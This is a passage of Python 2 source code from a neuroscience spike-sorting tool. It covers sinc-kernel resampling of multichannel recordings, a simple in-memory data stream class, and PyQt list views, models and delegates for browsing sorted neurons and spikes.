- 1 of each of the interpolated points:\n #nt = nrawts + (resamplex-1) * (nrawts - 1)\n # the above can be simplified to:\n nt = nrawts*resamplex - resamplex + 1\n tstart = rawts[0]\n ts = np.arange(tstart, tstart+tres*nt, tres) # generate interpolated timepoints\n #print 'len(ts) is %r' % len(ts)\n assert len(ts) == nt\n # resampled data, leave as int32 for convolution, then convert to int16:\n data = np.empty((nchans, nt), dtype=np.int32)\n #print 'data.shape = %r' % (data.shape,)\n #tconvolve = time.time()\n tconvolvesum = 0\n # Only the chans that are actually needed are resampled and returned.\n # Assume that chans index into ADchans. Normally they should map 1 to 1, ie chan 0\n # taps off of ADchan 0, but for probes like pt16a_HS27 and pt16b_HS27, it seems\n # ADchans start at 4. However, because self.kernels is indexed into using chans, and\n # chans are always assumed to be contiguous from 0, this shouldn't cause a problem\n for chani, chan in enumerate(chans):\n for point, kernel in enumerate(self.kernels[chan]):\n \"\"\"np.convolve(a, v, mode)\n for mode='same', only the K middle values are returned starting at n = (M-1)/2\n where K = len(a)-1 and M = len(v) - 1 and K >= M\n for mode='valid', you get the middle len(a) - len(v) + 1 number of values\"\"\"\n #tconvolveonce = time.time()\n row = np.convolve(rawdata[chani], kernel, mode='same')\n #tconvolvesum += (time.time()-tconvolveonce)\n #print 'len(rawdata[chani]) = %r' % len(rawdata[chani])\n #print 'len(kernel) = %r' % len(kernel)\n #print 'len(row): %r' % len(row)\n # interleave by assigning from point to end in steps of resamplex\n # index to start filling data from for this kernel's points:\n ti0 = (resamplex - point) % resamplex\n # index of first data point to use from convolution result 'row':\n rowti0 = int(point > 0)\n # discard the first data point from interpolant's convolutions, but not for\n # raw data's convolutions, since interpolated values have to be bounded on both\n # sides by raw values?\n data[chani, ti0::resamplex] = row[rowti0:]\n #print('convolve loop took %.3f sec' % (time.time()-tconvolve))\n #print('convolve calls took %.3f sec total' % (tconvolvesum))\n #tundoscaling = time.time()\n data >>= 16 # undo kernel scaling, shift 16 bits right in place, same as //= 2**16\n #print('undo kernel scaling took %.3f sec total' % (time.time()-tundoscaling))\n return data, ts\n\n def get_kernels(self, ADchans, resamplex, N):\n \"\"\"Generate a different set of kernels for each ADchan to correct each ADchan's\n s+h delay. ADchans may not always be contiguous from 0, but chans are assumed\n to always be, and to always be in same order as ADchans.\n\n TODO: when resamplex > 1 and shcorrect == False, you only need resamplex - 1 kernels.\n You don't need a kernel for the original raw data points. Those won't be shifted,\n so you can just interleave appropriately.\n\n TODO: take DIN channel into account, might need to shift all highpass ADchans\n by 1us, see line 2412 in SurfBawdMain.pas. I think the layout.sh_delay_offset field\n may tell you if and by how much you should take this into account\n\n WARNING! TODO: not sure if say ADchan 4 will always have a delay of 4us, or only if\n it's preceded by AD chans 0, 1, 2 and 3 in the channel gain list - I suspect the latter\n is the case, but right now I'm coding the former. Note that there's a\n srff.layout.sh_delay_offset field that describes the sh delay for first chan of probe.\n Should probably take this into account, although it doesn't affect relative delays\n between chans, I think. I think it's usually 1us.\n \"\"\"\n # ordinal position of each ADchan in the hold queue of its ADC board:\n i = ADchans % NCHANSPERBOARD\n if self.shcorrect:\n dis = 1 * i # per channel delays, us\n # TODO: stop hard coding 1us delay per ordinal position\n else:\n dis = 0 * i\n ds = dis / self.rawtres # normalized per channel delays\n wh = hamming # window function\n h = np.sinc # sin(pi*t) / pi*t\n kernels = [] # list of array of kernels, indexed by [chan][resample point]\n for d in ds: # delay for this ADchan\n kernelrow = []\n for point in xrange(resamplex): # iterate over resampled points per raw point\n t0 = point/resamplex # some fraction of 1\n tstart = -N/2 - t0 - d\n tend = tstart + (N+1)\n # kernel sample timepoints, all of length N+1, float32s to match voltage\n # data type\n t = np.arange(tstart, tend, 1, dtype=np.float32)\n kernel = wh(t, N) * h(t) # windowed sinc, sums to 1.0, max val is 1.0\n # rescale to get values up to 2**16, convert to int32\n kernel = np.int32(np.round(kernel * 2**16))\n kernelrow.append(kernel)\n kernels.append(kernelrow)\n return kernels\n\n\nclass SimpleStream(Stream):\n \"\"\"Simple Stream loaded fully in advance\"\"\"\n def __init__(self, fname, wavedata, siteloc, rawsampfreq, masterclockfreq,\n intgain, extgain, sampfreq=None, shcorrect=None, bitshift=4):\n self._fname = fname\n self.wavedata = wavedata\n nchans, nt = wavedata.shape\n self.chans = np.arange(nchans) # this sets self.nchans\n self.nt = nt\n self.nADchans = self.nchans\n self.ADchans = np.arange(self.nADchans)\n self.layout = EmptyClass()\n self.layout.ADchanlist = self.ADchans # for the sake of self.resample()\n probematch = False\n for probetype in probes.TYPES:\n probe = probetype()\n if (probe.siteloc_arr() == siteloc).all():\n self.probe = probe\n probematch = True\n break\n if not probematch:\n raise ValueError(\"siteloc in %s doesn't match known probe type\" % fname)\n self.rawsampfreq = rawsampfreq\n self.rawtres = intround(1 / self.rawsampfreq * 1e6) # us\n self.masterclockfreq = masterclockfreq\n self.extgain = extgain\n self.intgain = intgain\n self.converter = Converter(intgain, extgain)\n self.sampfreq = sampfreq or DEFHIGHPASSSAMPFREQ # desired sampling frequency\n self.shcorrect = shcorrect or DEFHIGHPASSSHCORRECT\n self.bitshift = bitshift\n self.t0 = 0 # us\n self.t1 = nt * self.rawtres\n self.tranges = np.int64([[self.t0, self.t1]])\n\n def open(self):\n pass\n\n def is_open(self):\n return True\n\n def close(self):\n pass\n\n def get_fname(self):\n return self._fname\n\n fname = property(get_fname)\n\n def get_datetime(self):\n \"\"\".tsf files don't currently have a datetime stamp, return Unix epoch instead\"\"\"\n return UNIXEPOCH\n\n datetime = property(get_datetime)\n \n def __getstate__(self):\n \"\"\"Get object state for pickling\"\"\"\n # copy it cuz we'll be making changes, this is fast because it's just a shallow copy\n d = self.__dict__.copy()\n try: del d['wavedata'] # takes up way too much space\n except KeyError: pass\n return d\n\n def __getitem__(self, key):\n \"\"\"Called when Stream object is indexed into using [] or with a slice object,\n indicating start and end timepoints in us. Returns the corresponding WaveForm\n object with the full set of chans\"\"\"\n if key.step not in [None, 1]:\n raise ValueError('unsupported slice step size: %s' % key.step)\n return self(key.start, key.stop, self.chans)\n\n def __call__(self, start, stop, chans=None):\n \"\"\"Called when Stream object is called using (). start and stop indicate start\n and end timepoints in us. Returns the corresponding WaveForm object with just the\n specificed chans\"\"\"\n if chans == None:\n chans = self.chans\n if not set(chans).issubset(self.chans):\n raise ValueError(\"requested chans %r are not a subset of available enabled \"\n \"chans %r in %s stream\" % (chans, self.chans, self.kind))\n nchans = len(chans)\n rawtres = self.rawtres\n resample = self.sampfreq != self.rawsampfreq or self.shcorrect == True\n if resample:\n # excess data in us at either end, to eliminate interpolation distortion at\n # key.start and key.stop\n xs = KERNELSIZE * rawtres\n else:\n xs = 0\n # get a slightly greater range of raw data (with xs) than might be needed:\n t0xsi = (start - xs) // rawtres # round down to nearest mult of rawtres\n t1xsi = ((stop + xs) // rawtres) + 1 # round up to nearest mult of rawtres\n # stay within stream limits, thereby avoiding interpolation edge effects:\n t0xsi = max(t0xsi, self.t0 // rawtres)\n t1xsi = min(t1xsi, self.t1 // rawtres)\n # convert back to us:\n t0xs = t0xsi * rawtres\n t1xs = t1xsi * rawtres\n tsxs = np.arange(t0xs, t1xs, rawtres)\n ntxs = len(tsxs)\n # init data as int32 so we have bitwidth to rescale and zero, then convert to int16\n dataxs = np.int32(self.wavedata[:, t0xsi:t1xsi])\n\n # bitshift left by 4 to scale 12 bit values to use full 16 bit dynamic range, same as\n # * 2**(16-12) == 16. This provides more fidelity for interpolation, reduces uV per\n # AD to about 0.02\n if self.bitshift:\n dataxs <<= self.bitshift # data is still int32 at this point\n\n # do any resampling if necessary:\n if resample:\n #tresample = time.time()\n dataxs, tsxs = self.resample(dataxs, tsxs, chans)\n #print('resample took %.3f sec' % (time.time()-tresample))\n else: # don't resample, just cut out self.chans data, if necessary\n if range(nchans) != list(self.chans):\n # some chans are disabled. This is kind of a hack, but works\n # because ADchans map to probe chans 1 to 1, and both start from 0\n dataxs = dataxs[self.chans]\n\n # now trim down to just the requested time range:\n lo, hi = tsxs.searchsorted([start, stop])\n data = dataxs[:, lo:hi]\n ts = tsxs[lo:hi]\n\n # should be safe to convert back down to int16 now:\n data = np.int16(data)\n return WaveForm(data=data, ts=ts, chans=chans)\n\n \nclass SpykeToolWindow(QtGui.QMainWindow):\n \"\"\"Base class for all of spyke's tool windows\"\"\"\n def __init__(self, parent, flags=Qt.Tool):\n QtGui.QMainWindow.__init__(self, parent, flags)\n self.maximized = False\n\n def keyPressEvent(self, event):\n key = event.key()\n if key == Qt.Key_F11:\n self.toggleMaximized()\n else:\n QtGui.QMainWindow.keyPressEvent(self, event) # pass it on\n\n def mouseDoubleClickEvent(self, event):\n \"\"\"Doesn't catch window titlebar doubleclicks for some reason (window manager\n catches them?). Have to doubleclick on a part of the window with no widgets in it\"\"\"\n self.toggleMaximized()\n\n def closeEvent(self, event):\n # remove 'Window' from class name\n windowtype = type(self).__name__.replace('Window', '')\n self.parent().HideWindow(windowtype)\n\n def toggleMaximized(self):\n if not self.maximized:\n self.normalPos, self.normalSize = self.pos(), self.size()\n dw = QtGui.QDesktopWidget()\n rect = dw.availableGeometry(self)\n self.setGeometry(rect)\n self.maximized = True\n else: # restore\n self.resize(self.normalSize)\n self.move(self.normalPos)\n self.maximized = False\n\n\nclass SpykeListView(QtGui.QListView):\n def __init__(self, parent):\n QtGui.QListView.__init__(self, parent)\n self.sortwin = parent\n #self.setSelectionBehavior(QTableWidget.SelectRows)\n self.setSelectionMode(QtGui.QListView.ExtendedSelection)\n self.setLayoutMode(QtGui.QListView.Batched) # prevents lockup during huge layout ops\n # Setting resize mode to \"adjust\" sometimes results in a bug where Qt seems to\n # be reflowing the contents many times over before it finally stops, resulting in\n # very slow operations when changing list contents (like adding/removing neurons).\n # But, with this disabled, the contents no longer reflow, and you're forced to use\n # scrollbars unnecessarily to see all the list contents. This might also be\n # interacting with the setWrapping and/or setBatchSize features:\n #self.setResizeMode(QtGui.QListView.Adjust) # recalculates layout on resize\n self.setUniformItemSizes(True) # speeds up listview\n self.setFlow(QtGui.QListView.LeftToRight) # default is TopToBottom\n self.setWrapping(True)\n self.setBatchSize(300)\n #self.setViewMode(QtGui.QListView.IconMode)\n\n def mousePressEvent(self, event):\n sw = self.sortwin\n buttons = event.buttons()\n if buttons == QtCore.Qt.LeftButton:\n QtGui.QListView.mousePressEvent(self, event) # handle as usual\n else:\n self.sortwin.mousePressEvent(event) # pass on up to Sort window\n\n def keyPressEvent(self, event):\n key = event.key()\n modifiers = event.modifiers()\n ctrldown = bool(Qt.ControlModifier & modifiers)\n ctrlup = not ctrldown\n if (key in [Qt.Key_M, Qt.Key_G, Qt.Key_Equal, Qt.Key_Minus, Qt.Key_Slash, Qt.Key_P,\n Qt.Key_Backslash, Qt.Key_NumberSign, Qt.Key_F, Qt.Key_R, Qt.Key_B,\n Qt.Key_BracketLeft, Qt.Key_BracketRight,\n Qt.Key_Comma, Qt.Key_Period, Qt.Key_C, Qt.Key_T]\n or ctrlup and key == Qt.Key_Space):\n event.ignore() # pass it on up to the parent\n else:\n QtGui.QListView.keyPressEvent(self, event) # handle it as usual\n\n def selectionChanged(self, selected, deselected, prefix=None):\n \"\"\"Plot neurons or spikes on list item selection\"\"\"\n QtGui.QListView.selectionChanged(self, selected, deselected)\n panel = self.sortwin.panel\n addis = [ i.data().toInt()[0] for i in selected.indexes() ]\n remis = [ i.data().toInt()[0] for i in deselected.indexes() ]\n panel.removeItems([ prefix+str(i) for i in remis ])\n # for speed, don't allow more than MAXNSPIKEPLOTS spikes to be plotted in sort panel:\n if prefix == 's':\n '''\n # note that self.nrowsSelected seems to report nrows selected *including* those\n # added and removed by the current selection event\n net = len(addis) - len(remis)\n print('num selected %d' % self.nrowsSelected)\n print('net change is %d' % net)\n nwereselected = self.nrowsSelected - net\n print('num were selected is %d' % nwereselected)\n maxnadd = max(MAXNSPIKEPLOTS - nwereselected + len(remis), 0)\n print('maxnadd is %d' % maxnadd)\n addis = addis[:maxnadd]\n '''\n nadd = len(addis)\n maxnadd = max(MAXNSPIKEPLOTS - self.nrowsSelected + nadd, 0)\n if maxnadd == 0:\n return\n if nadd > maxnadd:\n # if we can't add all the requested spikes to the sort panel without\n # exceeding MAXNSPIKEPLOTS, then randomly sample however many we can still\n # add (maxnadd), and add them to the sort panel\n print('adding %d randomly sampled plots of %d selected spikes'\n % (maxnadd, self.nrowsSelected))\n addis = random.sample(addis, maxnadd)\n panel.maxed_out = True\n else:\n panel.maxed_out = False\n #t0 = time.time()\n panel.addItems([ prefix+str(i) for i in addis ])\n #print('addItems took %.3f sec' % (time.time()-t0))\n #print(\"done selchanged, %r, addis=%r, remis=%r\" % (prefix, addis, remis))\n\n def updateAll(self):\n self.model().updateAll()\n\n def get_nrows(self):\n return self.model().rowCount()\n\n nrows = property(get_nrows)\n\n def selectRows(self, rows, on=True, scrollTo=False):\n \"\"\"Row selection in listview is complex. This makes it simpler\"\"\"\n ## TODO: There's a bug here, where if you select the last two neurons in nlist,\n ## (perhaps these last two need to be near a list edge), merge them, and then\n ## undo,then merge again (instead of just redoing), then undo again, they're\n ## both selected, but only the first is replotted because the selchanged event\n ## is only passed the first of the two as being newly selected. If however,\n ## before remerging, you clear the selection, or select something else, and then\n ## go back and select those same two neurons and merge, and undo, it works fine,\n ## and the selchanged event gets both items as newly selected. Seems like a Qt\n ## bug, or at least some very subtle timing problem of some kind. This might have\n ## something to do with reflow when changing list contents, but even resetting\n ## listview behaviour to default doesn't make this go away. Also, seems to happen\n ## for selection of one index at a time, and for doing it all in one go with a\n ## QItemSelection.\n \n rows = toiter(rows)\n m = self.model()\n sm = self.selectionModel()\n if on:\n flag = sm.Select\n else:\n flag = sm.Deselect\n #print('start select=%r loop for rows %r' % (on, rows))\n '''\n # unnecessarily emits nrows selectionChanged signals, causes slow\n # plotting in mpl commit 50fc548465b1525255bc2d9f66a6c7c95fd38a75 (pre\n # 1.0) and later:\n [ sm.select(m.index(row), flag) for row in rows ]\n '''\n # emits single selectionChanged signal, more efficient, but causes a bit of\n # flickering, or at least used to in Qt 4.7.0:\n sel = QtGui.QItemSelection()\n for row in rows:\n index = m.index(row)\n #print('row: %r, index: %r' % (row, index))\n sel.select(index, index) # topleft to bottomright\n #print('sel has indexes, rows, cols, data:')\n #for index in sel.indexes():\n # print(index, index.row(), index.column(), index.data())\n sm.select(sel, flag)\n #print('end select loop')\n '''\n # constantly scrolling to selection slows everything quite noticeably, especially\n # when using the spike selection sortwin.slider\n if scrollTo and on and len(rows) > 0: # scroll to last row that was just selected\n self.scrollTo(m.index(rows[-1]))\n '''\n def selectedRows(self):\n \"\"\"Return list of selected rows\"\"\"\n return [ i.row() for i in self.selectedIndexes() ]\n\n def rowSelected(self, row):\n \"\"\"Simple way to check if a row is selected\"\"\"\n return self.model().index(row) in self.selectedIndexes()\n\n def get_nrowsSelected(self):\n return len(self.selectedIndexes())\n\n nrowsSelected = property(get_nrowsSelected)\n\n def selectRandom(self, start, stop, nsamples):\n \"\"\"Select random sample of rows\"\"\"\n start = max(0, start)\n if stop == -1:\n stop = self.nrows\n stop = min(self.nrows, stop)\n nrows = stop - start\n nsamples = min(nsamples, nrows)\n rows = random.sample(xrange(start, stop), nsamples)\n self.selectRows(rows, scrollTo=False)\n\n\nclass NList(SpykeListView):\n \"\"\"Neuron list view\"\"\"\n def __init__(self, parent):\n SpykeListView.__init__(self, parent)\n self.setModel(NListModel(parent))\n self.setItemDelegate(NListDelegate(parent))\n self.connect(self, QtCore.SIGNAL(\"activated(QModelIndex)\"),\n self.on_actionItem_activated)\n\n def selectionChanged(self, selected, deselected):\n SpykeListView.selectionChanged(self, selected, deselected, prefix='n')\n selnids = [ i.data().toInt()[0] for i in self.selectedIndexes() ]\n #if 1 <= len(selnids) <= 3: # populate nslist if exactly 1, 2 or 3 neurons selected\n self.sortwin.nslist.neurons = [ self.sortwin.sort.neurons[nid] for nid in selnids ]\n #else:\n # self.sortwin.nslist.neurons = []\n\n def on_actionItem_activated(self, index):\n sw = self.sortwin\n sw.parent().ui.plotButton.click()\n\n\nclass NSList(SpykeListView):\n \"\"\"Spike list view\"\"\"\n def __init__(self, parent):\n SpykeListView.__init__(self, parent)\n self.setModel(NSListModel(parent))\n self.connect(self, QtCore.SIGNAL(\"activated(QModelIndex)\"),\n self.on_actionItem_activated)\n\n def selectionChanged(self, selected, deselected):\n SpykeListView.selectionChanged(self, selected, deselected, prefix='s')\n\n def on_actionItem_activated(self, index):\n sw = self.sortwin\n if sw.sort.stream.is_open():\n sid = self.sids[index.row()]\n spike = sw.sort.spikes[sid]\n sw.parent().seek(spike['t'])\n else:\n sw.parent().ui.plotButton.click()\n\n def get_neurons(self):\n return self.model().neurons\n\n def set_neurons(self, neurons):\n \"\"\"Every time neurons are set, clear any existing selection and update data model\"\"\"\n self.clearSelection() # remove any plotted sids, at least for now\n self.model().neurons = neurons\n\n neurons = property(get_neurons, set_neurons)\n\n def get_nids(self):\n return np.asarray([ neuron.id for neuron in self.model().neurons ])\n\n nids = property(get_nids)\n\n def get_sids(self):\n return self.model().sids\n\n sids = property(get_sids)\n\n def keyPressEvent(self, event):\n sw = self.sortwin\n key = event.key()\n # passing horizontal keys to nlist assumes nslist is a single column\n # and are therefore not needed:\n if key in [Qt.Key_Enter, Qt.Key_Return, Qt.Key_Left, Qt.Key_Right]:\n sw.nlist.keyPressEvent(event) # pass on to nlist\n else:\n SpykeListView.keyPressEvent(self, event) # handle it as usual\n\n def selectRandom(self, nsamples):\n \"\"\"Select up to nsamples random rows per neuron\"\"\"\n if self.model().sliding == True:\n self.neurons = self.neurons # trigger NSListModel.set_neurons() call\n self.model().sliding = False\n for neuron in self.neurons:\n allrows = self.sids.searchsorted(neuron.sids)\n nsamples = min(nsamples, len(allrows))\n rows = random.sample(allrows, nsamples)\n self.selectRows(rows, scrollTo=False)\n\n\nclass USList(SpykeListView):\n \"\"\"Unsorted spike list view\"\"\"\n def __init__(self, parent):\n SpykeListView.__init__(self, parent)\n self.setModel(USListModel(parent))\n self.connect(self, QtCore.SIGNAL(\"activated(QModelIndex)\"),\n self.on_actionItem_activated)\n\n def keyPressEvent(self, event):\n sw = self.sortwin\n key = event.key()\n if key in [Qt.Key_Enter, Qt.Key_Return]:\n sw.nlist.keyPressEvent(event) # pass on to nlist\n else:\n SpykeListView.keyPressEvent(self, event) # handle it as usual\n\n def selectionChanged(self, selected, deselected):\n SpykeListView.selectionChanged(self, selected, deselected, prefix='s')\n\n def on_actionItem_activated(self, index):\n sw = self.sortwin\n if sw.sort.stream.is_open():\n sid = sw.sort.usids[index.row()]\n spike = sw.sort.spikes[sid]\n sw.parent().seek(spike['t'])\n else:\n sw.parent().ui.plotButton.click()\n\n def selectRandom(self, nsamples):\n \"\"\"Select up to nsamples random rows\"\"\"\n SpykeListView.selectRandom(self, 0, -1, nsamples)\n\n\nclass SpykeAbstractListModel(QtCore.QAbstractListModel):\n def __init__(self, parent):\n QtCore.QAbstractListModel.__init__(self, parent)\n self.sortwin = parent\n\n def updateAll(self):\n \"\"\"Emit dataChanged signal so that view updates itself immediately.\n Hard to believe this doesn't already exist in some form\"\"\"\n i0 = self.createIndex(0, 0) # row, col\n i1 = self.createIndex(self.rowCount()-1, 0) # seems this isn't necessary\n # seems to refresh all, though should only refresh 1st row:\n #self.dataChanged.emit(i0, i0)\n self.dataChanged.emit(i0, i1) # refresh all\n\n\nclass NListModel(SpykeAbstractListModel):\n \"\"\"Model for neuron list view\"\"\"\n def rowCount(self, parent=None):\n try:\n # update nlist tooltip before returning, only +ve nids count as neurons:\n sort = self.sortwin.sort\n nneurons = (np.asarray(sort.norder) > 0).sum()\n ngood = len(sort.get_good())\n self.sortwin.nlist.setToolTip(\"Neuron list\\n%d neurons, %d good\"\n % (nneurons, ngood))\n return len(sort.norder)\n except AttributeError: # sort doesn't exist\n self.sortwin.nlist.setToolTip(\"Neuron list\")\n return 0\n\n def data(self, index, role=Qt.DisplayRole):\n if index.isValid():\n neurons = self.sortwin.sort.neurons\n norder = self.sortwin.sort.norder\n try:\n nid = norder[index.row()]\n except IndexError:\n print('WARNING: tried to index non-existent row %d' % index.row())\n #print('.data(): row=%d, val=%d' % (index.row(), nid))\n if role == Qt.DisplayRole:\n return nid # no need to use QVariant() apparently\n elif role == Qt.ToolTipRole:\n neuron = neurons[nid]\n try:\n chan = neuron.chan\n except ValueError: # probably not enough overlapping chans for a template\n chan = None\n pos = neuron.cluster.pos\n return ('nid: %d\\n' % nid +\n '%d spikes\\n' % neuron.nspikes +\n 'chan: %r\\n' % chan +\n 't: %d us\\n' % pos['t'] +\n 'dt: %.4g us\\n' % pos['dt'] +\n 'x0: %.4g um\\n' % pos['x0'] +\n 'y0: %.4g um\\n' % pos['y0'] +\n 'Vpp: %.4g uV\\n' % pos['Vpp'] +\n 'sx: %.4g um' % pos['sx'])\n # this stuff is handled in NListDelegate:\n '''\n elif role == Qt.ForegroundRole:\n if nid in self.sortwin.sort.get_good():\n return QtGui.QBrush(QtGui.QColor(255, 255, 255))\n elif role == Qt.BackgroundRole:\n if nid in self.sortwin.sort.get_good():\n return QtGui.QBrush(QtGui.QColor(0, 128, 0))\n '''\nclass SListModel(SpykeAbstractListModel):\n \"\"\"Base model for spike list models\"\"\"\n def spiketooltip(self, spike):\n return ('sid: %d\\n' % spike['id'] +\n 'nid: %d\\n' % spike['nid'] +\n 'chan: %d\\n' % spike['chan'] +\n 't: %d us\\n' % spike['t'] +\n 'dt: %.4g us\\n' % spike['dt'] +\n 'x0: %.4g um\\n' % spike['x0'] +\n 'y0: %.4g um\\n' % spike['y0'] +\n 'Vpp: %.4g uV\\n' % spike['Vpp'] +\n 'sx: %.4g um' % spike['sx'])\n\n\nclass NSListModel(SListModel):\n \"\"\"Model for neuron spikes list view\"\"\"\n def __init__(self, parent):\n SpykeAbstractListModel.__init__(self, parent)\n self._neurons = []\n self.nspikes = 0\n self.sids = np.empty(0, dtype=np.int32)\n\n def get_neurons(self):\n return self._neurons\n\n def set_neurons(self, neurons):\n self._neurons = neurons\n if neurons:\n self.sids = np.concatenate([ neuron.sids for neuron in neurons ])\n self.sids.sort() # keep them sorted\n self.sortwin.slider.setEnabled(True)\n else:\n self.sids = np.empty(0, dtype=np.int32)\n self.sortwin.slider.setEnabled(False)\n self.nspikes = len(self.sids)\n # triggers new calls to rowCount() and data(), and critically, clears selection\n # before moving slider to pos 0, which triggers slider.valueChanged:\n self.reset()\n self.sortwin.slider.setValue(0) # reset position to 0\n self.sortwin.update_slider() # update limits and step sizes\n self.sliding = False\n\n neurons = property(get_neurons, set_neurons)\n\n def rowCount(self, parent=None):\n # update nslist tooltip before returning:\n self.sortwin.nslist.setToolTip(\"Sorted spike list\\n%d spikes\" % self.nspikes)\n return self.nspikes\n\n def data(self, index, role=Qt.DisplayRole):\n if index.isValid() and role in [Qt.DisplayRole, Qt.ToolTipRole]:\n sid = int(self.sids[index.row()])\n if role == Qt.DisplayRole:\n return sid\n elif role == Qt.ToolTipRole:\n spike = self.sortwin.sort.spikes[sid]\n return self.spiketooltip(spike)\n\n\nclass USListModel(SListModel):\n \"\"\"Model for unsorted spike list view\"\"\"\n def rowCount(self, parent=None):\n try:\n nspikes = len(self.sortwin.sort.usids)\n # update uslist tooltip before returning:\n self.sortwin.uslist.setToolTip(\"Unsorted spike list\\n%d spikes\" % nspikes)\n return nspikes\n except AttributeError: # sort doesn't exist\n self.sortwin.uslist.setToolTip(\"Unsorted spike list\")\n return 0\n\n def data(self, index, role=Qt.DisplayRole):\n if index.isValid() and role in [Qt.DisplayRole, Qt.ToolTipRole]:\n sid = int(self.sortwin.sort.usids[index.row()])\n if role == Qt.DisplayRole:\n return sid\n elif role == Qt.ToolTipRole:\n spike = self.sortwin.sort.spikes[sid]\n return self.spiketooltip(spike)\n\n\nclass NListDelegate(QtGui.QStyledItemDelegate):\n \"\"\"Delegate for neuron list view, modifies appearance of items\"\"\"\n def __init__(self, parent):\n QtGui.QStyledItemDelegate.__init__(self, parent)\n self.sortwin = parent\n palette = QtGui.QApplication.palette()\n self.selectedgoodbrush = QtGui.QBrush(QtGui.QColor(0, 0, 255)) # blue\n self.unselectedgoodbrush = QtGui.QBrush(QtGui.QColor(0, 128, 0)) # mid green\n self.selectedbrush = palette.highlight()\n self.unselectedbrush = palette.base()\n self.selectedgoodpen = QtGui.QPen(Qt.white)\n self.unselectedgoodpen = QtGui.QPen(Qt.white)\n self.selectedpen = QtGui.QPen(palette.highlightedText().color())\n self.unselectedpen = QtGui.QPen(palette.text().color())\n self.focusedpen = QtGui.QPen(Qt.gray, 0, Qt.DashLine)\n self.focusedpen.setDashPattern([1, 1])\n self.focusedpen.setCapStyle(Qt.FlatCap)\n\n def paint(self, painter, option, index):\n \"\"\"Change background colour for nids designated as \"good\"\"\"\n model = index.model()\n nid = model.data(index) # should come out as an int\n good = nid in self.sortwin.sort.get_good()\n # don't care whether self is active or inactive, only care about\n # selection, \"good\", and focused states\n selected = option.state & QtGui.QStyle.State_Selected\n focused = option.state & QtGui.QStyle.State_HasFocus\n painter.save()\n # paint background:\n painter.setPen(QtGui.QPen(Qt.NoPen))\n if selected:\n if good:\n painter.setBrush(self.selectedgoodbrush)\n else: # use default selection brush\n painter.setBrush(self.selectedbrush)\n else: # unselected\n if good:\n painter.setBrush(self.unselectedgoodbrush)\n else: # use default background brush\n painter.setBrush(self.unselectedbrush)\n painter.drawRect(option.rect)\n # paint focus rect:\n if focused:\n rect = copy(option.rect)\n painter.setBrush(Qt.NoBrush) # no need to draw bg again\n painter.setPen(self.focusedpen)\n rect.adjust(0, 0, -1, -1) # make space for outline\n painter.drawRect(rect)\n # paint foreground:\n value = index.data(Qt.DisplayRole)\n if selected:\n if good:\n painter.setPen(self.selectedgoodpen)\n else: # use default selection pen\n painter.setPen(self.selectedpen)\n else: # unselected\n if good:\n painter.setPen(self.unselectedgoodpen)\n else: # use default background pen\n painter.setPen(self.unselectedpen)\n text = value.toString()\n painter.drawText(option.rect, Qt.AlignCenter, text)\n painter.restore()\n\n\nclass ClusterTabSpinBox(QtGui.QSpinBox):\n \"\"\"Intercept CTRL+Z key event for cluster undo instead of spinbox edit undo\"\"\"\n def keyPressEvent(self, event):\n if event.key() == Qt.Key_Z and event.modifiers() == Qt.ControlModifier:\n self.topLevelWidget().on_actionUndo_triggered()\n else:\n QtGui.QSpinBox.keyPressEvent(self, event) # handle it as usual\n\n\nclass ClusterTabDoubleSpinBox(QtGui.QDoubleSpinBox):\n \"\"\"Intercept CTRL+Z key event for cluster undo instead of spinbox edit undo\"\"\"\n def keyPressEvent(self, event):\n if event.key() == Qt.Key_Z and event.modifiers() == Qt.ControlModifier:\n self.topLevelWidget().on_actionUndo_triggered()\n else:\n QtGui.QDoubleSpinBox.keyPressEvent(self, event) # handle it as usual\n\n\nclass ClusteringGroupBox(QtGui.QGroupBox):\n \"\"\"Make ENTER key event activate the cluster button\"\"\"\n def keyPressEvent(self, event):\n if event.key() in [Qt.Key_Enter, Qt.Key_Return]:\n self.topLevelWidget().ui.clusterButton.click()\n else:\n QtGui.QGroupBox.keyPressEvent(self, event) # handle it as usual\n\n\nclass PlottingGroupBox(QtGui.QGroupBox):\n \"\"\"Make ENTER key event activate the plot button\"\"\"\n def keyPressEvent(self, event):\n if event.key() in [Qt.Key_Enter, Qt.Key_Return]:\n self.topLevelWidget().ui.plotButton.click()\n else:\n QtGui.QGroupBox.keyPressEvent(self, event) # handle it as usual\n\n\nclass XCorrsGroupBox(QtGui.QGroupBox):\n \"\"\"Make ENTER key event activate the correlograms plot button\"\"\"\n def keyPressEvent(self, event):\n if event.key() in [Qt.Key_Enter, Qt.Key_Return]:\n self.topLevelWidget().ui.plotXcorrsButton.click()\n else:\n QtGui.QGroupBox.keyPressEvent(self, event) # handle it as usual\n\n\nclass SpikeSelectionSlider(QtGui.QSlider):\n \"\"\"Make ENTER key event activate the plot button\"\"\"\n def keyPressEvent(self, event):\n if event.key() in [Qt.Key_Enter, Qt.Key_Return]:\n self.topLevelWidget().spykewindow.ui.plotButton.click()\n else:\n QtGui.QSlider.keyPressEvent(self, event) # handle it as usual\n\n\nclass Stack(list):\n \"\"\"A list that doesn't allow -ve indices\"\"\"\n def __getitem__(self, key):\n if key < 0:\n raise IndexError('stack index %d out of range' % key)\n return list.__getitem__(self, key)\n\n\nclass ClusterChange(object):\n \"\"\"Stores info for undoing/redoing a change to any set of clusters\"\"\"\n def __init__(self, sids, spikes, message):\n self.sids = sids\n self.spikes = spikes\n self.message = message\n\n def __repr__(self):\n return self.message\n\n def save_old(self, oldclusters, oldnorder, oldgood):\n self.oldnids = self.spikes['nid'][self.sids] # this seems to create a copy\n self.oldunids = [ c.id for c in oldclusters ]\n self.oldposs = [ c.pos.copy() for c in oldclusters ]\n self.oldnormposs = [ c.normpos.copy() for c in oldclusters ]\n self.oldnorder = copy(oldnorder)\n self.oldgood = copy(oldgood)\n\n def save_new(self, newclusters, newnorder, newgood):\n self.newnids = self.spikes['nid'][self.sids] # this seems to create a copy\n self.newunids = [ c.id for c in newclusters ]\n self.newposs = [ c.pos.copy() for c in newclusters ]\n self.newnormposs = [ c.normpos.copy() for c in newclusters ]\n self.newnorder = copy(newnorder)\n self.newgood = copy(newgood)\n\ndef get_sha1(fname, blocksize=2**20):\n \"\"\"Gets the sha1 hash of file designated by fname (with full path)\"\"\"\n m = hashlib.sha1()\n with open(fname, 'rb') as f:\n # continually update hash until EOF\n while True:\n block = f.read(blocksize)\n if not block:\n break\n m.update(block)\n return m.hexdigest()\n\ndef intround(n):\n \"\"\"Round to the nearest integer, return an integer. Works on arrays.\n Saves on parentheses, nothing more\"\"\"\n if iterable(n): # it's a sequence, return as an int64 array\n return 